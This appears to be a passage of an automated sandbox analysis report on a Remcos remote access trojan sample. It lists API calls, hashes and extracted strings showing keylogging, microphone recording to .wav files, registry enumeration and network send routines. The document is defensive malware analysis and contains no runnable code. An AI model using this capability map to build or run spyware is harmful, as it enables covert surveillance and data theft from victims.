                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                  • String ID: <$@$@FG$TUF
                                                  • API String ID: 1107811701-3349172182
                                                  • Opcode ID: b36bc87eb4507af4992a544fbd13103342267bc18c2cc7e8b00c7cda52f17d37
                                                  • Instruction ID: 2ab6b40b45e3c8af491b29a4f89a074ae5c31ab33457135fdf2d0c5a1d9f58ac
                                                  • Opcode Fuzzy Hash: b36bc87eb4507af4992a544fbd13103342267bc18c2cc7e8b00c7cda52f17d37
                                                  • Instruction Fuzzy Hash: 51319D31A802099FDB55FBA0DC95AEEB736AF50300F004168FB06664E4EF745E8ADF94
                                                  APIs
                                                  • _strftime.LIBCMT ref: 00401AD3
                                                    • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                  • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                  • API String ID: 3809562944-3643129801
                                                  • Opcode ID: 4eae73abab5cec10745b217a761eb3c0bf0d0a7b5b73b4b46abcecbfa30289f5
                                                  • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                  • Opcode Fuzzy Hash: 4eae73abab5cec10745b217a761eb3c0bf0d0a7b5b73b4b46abcecbfa30289f5
                                                  • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                  • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                  • waveInStart.WINMM ref: 00401A81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: XCG$`=G$x=G
                                                  • API String ID: 1356121797-903574159
                                                  • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                  • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                  • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                  • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 020F1BE2
                                                  • waveInOpen.WINMM(00471AF8,000000FF,00471B00,00401A8E,00000000,00000000,00000024), ref: 020F1C78
                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 020F1CCD
                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 020F1CDC
                                                  • waveInStart.WINMM ref: 020F1CE8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: XCG$`=G$x=G
                                                  • API String ID: 1356121797-903574159
                                                  • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                  • Instruction ID: b848b48b1c6d0282bf375aa3a3cebaae720ce9a29fbc9ae75d2346a70c58adaa
                                                  • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                  • Instruction Fuzzy Hash: A72171316413019BC714DF7DBD1595A7BAAFB84741B00843AF11DD76B4EBB49885DB0C
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 020F9C68
                                                  • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 020F9C76
                                                  • GetLastError.KERNEL32 ref: 020F9C82
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 020F9CD2
                                                  • TranslateMessage.USER32(?), ref: 020F9CE1
                                                  • DispatchMessageA.USER32(?), ref: 020F9CEC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error $`#v
                                                  • API String ID: 3219506041-3226811161
                                                  • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                  • Instruction ID: 99486037b22bc40ab56123223bde10b7bb31a35dbede0d0bb2bf64f4831899a1
                                                  • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                  • Instruction Fuzzy Hash: 2B1123716843049FC390BB79AC49E6B77ECAB94B12B00057EFE46C2250FB20D500EBA6
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                    • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                    • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                    • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                  • lstrcpyn.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                  • Shell_NotifyIcon.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                  • TranslateMessage.USER32(?), ref: 0041C9FB
                                                  • DispatchMessageA.USER32(?), ref: 0041CA05
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID: Remcos
                                                  • API String ID: 1970332568-165870891
                                                  • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                  • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                  • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                  • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                  • __alloca_probe_16.LIBCMT ref: 00452C91
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                  • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                  • __freea.LIBCMT ref: 00452DAA
                                                  • __freea.LIBCMT ref: 00452DB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 201697637-0
                                                  • Opcode ID: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                  • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                  • Opcode Fuzzy Hash: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                  • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 5328bd0f7edc37ac40c0d0f8fad2384ac8a9632e9013bb03371bda9eca2e0847
                                                  • Instruction ID: f323c036b52ba2a56e51905ad2900a0c754ba631ec0ba96165e2cd945cd91396
                                                  • Opcode Fuzzy Hash: 5328bd0f7edc37ac40c0d0f8fad2384ac8a9632e9013bb03371bda9eca2e0847
                                                  • Instruction Fuzzy Hash: B251BE31940289AFCB16DB78C840BEEBBF3FF09314F5401A9E899AB251D776A805CB50
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                  • _free.LIBCMT ref: 00444714
                                                  • _free.LIBCMT ref: 0044472D
                                                  • _free.LIBCMT ref: 0044475F
                                                  • _free.LIBCMT ref: 00444768
                                                  • _free.LIBCMT ref: 00444774
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                  • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                  • Opcode Fuzzy Hash: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                  • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • _memcmp.LIBVCRUNTIME ref: 0213490A
                                                  • _free.LIBCMT ref: 0213497B
                                                  • _free.LIBCMT ref: 02134994
                                                  • _free.LIBCMT ref: 021349C6
                                                  • _free.LIBCMT ref: 021349CF
                                                  • _free.LIBCMT ref: 021349DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
                                                  • Instruction ID: 6737df5ad712d193fa455e55e4691fcff6a832fa232b704b28311043e8db3c25
                                                  • Opcode Fuzzy Hash: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
                                                  • Instruction Fuzzy Hash: 71B12975A412299FDB25DF28C884BADB7B6FF08314F1045EAD949A7350E731AE90CF84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tcp$udp
                                                  • API String ID: 0-3725065008
                                                  • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                  • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                  • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                  • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004017BC
                                                    • Part of subcall function 004334CF: RtlEnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                    • Part of subcall function 004334CF: RtlLeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                  • RtlExitUserThread.KERNEL32(00000000), ref: 004017F4
                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                    • Part of subcall function 00433519: RtlEnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                    • Part of subcall function 00433519: RtlLeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
                                                  • String ID: T=G$p[G$>G$>G
                                                  • API String ID: 2307665288-2461731529
                                                  • Opcode ID: fe5e90c52b2a4af00fa55c4818981a24768df651f037b413a0e828960f6e16ee
                                                  • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                  • Opcode Fuzzy Hash: fe5e90c52b2a4af00fa55c4818981a24768df651f037b413a0e828960f6e16ee
                                                  • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 020F1A23
                                                    • Part of subcall function 02123736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 02123740
                                                    • Part of subcall function 02123736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 02123773
                                                  • RtlExitUserThread.NTDLL(00000000), ref: 020F1A5B
                                                  • waveInUnprepareHeader.WINMM(00001E64,00000020,00000000,?,00000020,00473EE8,00000000), ref: 020F1B69
                                                    • Part of subcall function 02123780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 0212378B
                                                    • Part of subcall function 02123780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 021237C8
                                                    • Part of subcall function 02123B0C: __onexit.LIBCMT ref: 02123B12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
                                                  • String ID: T=G$p[G$>G$>G
                                                  • API String ID: 2307665288-2461731529
                                                  • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                  • Instruction ID: 925499f992ede78824ae4b736b48d55a8e5378c547b3e9145df889d97537e94e
                                                  • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                  • Instruction Fuzzy Hash: 5841B4316843009FD3A5FB28DC95EEE73A6FB90310F44452DEB19865E0DF30A945EE59
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 02102F28
                                                    • Part of subcall function 02102C11: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 02102C84
                                                    • Part of subcall function 02102C11: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 02102CB3
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 02103098
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: TUF$TUFTUF$>G$DG$DG
                                                  • API String ID: 3114080316-72097156
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 020F9DA6
                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 020F9DB2
                                                  • GetKeyboardLayout.USER32(00000000), ref: 020F9DB9
                                                  • GetKeyState.USER32(00000010), ref: 020F9DC3
                                                  • GetKeyboardState.USER32(?), ref: 020F9DCE
                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 020F9E83
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                  • String ID: 8[G
                                                  • API String ID: 3566172867-1691237782
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                    • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                    • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID: .part
                                                  • API String ID: 1303771098-3499674018
                                                  APIs
                                                    • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                    • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                    • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                  • _wcslen.LIBCMT ref: 0041A8F6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                  • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                  • API String ID: 3286818993-703403762
                                                  APIs
                                                  • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                  • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: Console$Window$AllocOutputShow
                                                  • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                  • API String ID: 4067487056-2527699604
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                  • __alloca_probe_16.LIBCMT ref: 004499E2
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                  • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                  • __freea.LIBCMT ref: 00449B37
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  • __freea.LIBCMT ref: 00449B40
                                                  • __freea.LIBCMT ref: 00449B65
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  APIs
                                                  • SendInput.USER32 ref: 00418B08
                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                    • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
